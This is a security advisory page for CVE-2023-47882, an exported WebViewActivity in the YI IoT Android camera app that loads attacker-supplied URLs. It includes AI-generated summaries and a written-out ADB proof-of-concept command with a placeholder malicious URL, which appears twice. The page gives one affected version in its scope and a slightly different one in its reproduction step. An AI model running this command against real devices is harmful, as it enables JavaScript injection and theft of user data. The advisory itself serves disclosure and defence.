VYPR
← All advisories
Unrated severityNVD Advisory· Published Dec 27, 2023· Updated Aug 2, 2024

CVE-2023-47882

CVE-2023-47882

Description

The YI IoT Android app's WebViewActivity is exported and accepts implicit intents, allowing remote attacker to execute arbitrary JavaScript via a malicious URL.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

The YI IoT Android app's WebViewActivity is exported and accepts implicit intents, allowing remote attacker to execute arbitrary JavaScript via a malicious URL.

Vulnerability

The YI IoT Android application com.yunyi.smartcamera up to version 4.1.9_20231127 contains a vulnerability in the com.ants360.yicamera.activity.WebViewActivity component. This activity is marked as exported and accepts an implicit Intent, allowing any third-party application to invoke it without permissions. An attacker can supply a URL via the path extra, which the WebView loads, enabling arbitrary JavaScript execution [1][2].

Exploitation

An attacker can exploit this by crafting an implicit Intent with a path extra pointing to a malicious URL. This can be done via ADB command or through a malicious app installed on the same device. For example, using ADB: adb shell am start -n com.yunyi.smartcamera/com.ants360.yicamera.activity.WebViewActivity -e path "https://www.example.com/maliciousContent" [2]. The WebView then loads the URL and executes the JavaScript in the context of the vulnerable application.

Impact

Successful exploitation allows remote JavaScript execution within the YI IoT app's WebView. This could lead to unauthorized access to sensitive data, theft of user information, or manipulation of app functionality, all without requiring any special permissions [2].

Mitigation

As a mitigation, the android:exported attribute of the WebViewActivity should be set to false to prevent external access. As of the publication date, no official patch has been released in the available references [2].

References
  1. Yi iot - Apps on Google Play
  2. yi/CWE-319.md at main · actuator/yi

AI Insight generated on May 27, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected products

2
  • Kami Vision/Kami Vision YI IoTdescription
  • Kami Vision/YI IoTllm-create
    Range: <=4.1.9_20231127

Patches

0

No patches discovered yet.

Vulnerability mechanics

Root cause

"The WebViewActivity is exported and accepts an implicit Intent without validating the supplied URL, allowing arbitrary remote JavaScript to be loaded."

Attack vector

An attacker installs a malicious third-party application on the same Android device, which sends an implicit Intent to the exported `WebViewActivity` with a `path` extra containing a URL to attacker-controlled JavaScript content [ref_id=1]. The WebView loads the supplied URL, executing arbitrary JavaScript in the context of the YI IoT application [ref_id=1]. No permissions are required to trigger the vulnerability [ref_id=1].

Affected code

The vulnerable component is `com.ants360.yicamera.activity.WebViewActivity` in the `com.yunyi.smartcamera` package (YI IoT app up to version 4.1.9_20231127) [ref_id=1]. This activity is marked as exported and accepts an implicit Intent, allowing any third-party application to invoke it [ref_id=1].

What the fix does

The advisory recommends setting `android:exported` to `false` for `WebViewActivity` if external access is not intended, or validating the incoming URL against an allowlist [ref_id=1]. No official patch has been published by the vendor as of the advisory date [ref_id=1].

Preconditions

  • inputThe attacker must have a malicious third-party application installed on the same Android device as the vulnerable YI IoT app.
  • configThe YI IoT app must be version 4.1.9_20231127 or earlier.
  • authNo permissions are required; the WebViewActivity is exported and accepts implicit intents.

Reproduction

1. Install the YI IoT app (version 4.1.7_20231026 or earlier) on an Android device [ref_id=1]. 2. Execute the ADB command: `adb shell am start -n com.yunyi.smartcamera/com.ants360.yicamera.activity.WebViewActivity -e path "https://www.example.com/maliciousContent"` [ref_id=1]. 3. Alternatively, run the provided Java code from a third-party Android app to invoke the WebViewActivity with a malicious URL [ref_id=1].

Generated on May 24, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.

References

2

News mentions

0

No linked articles in our index yet.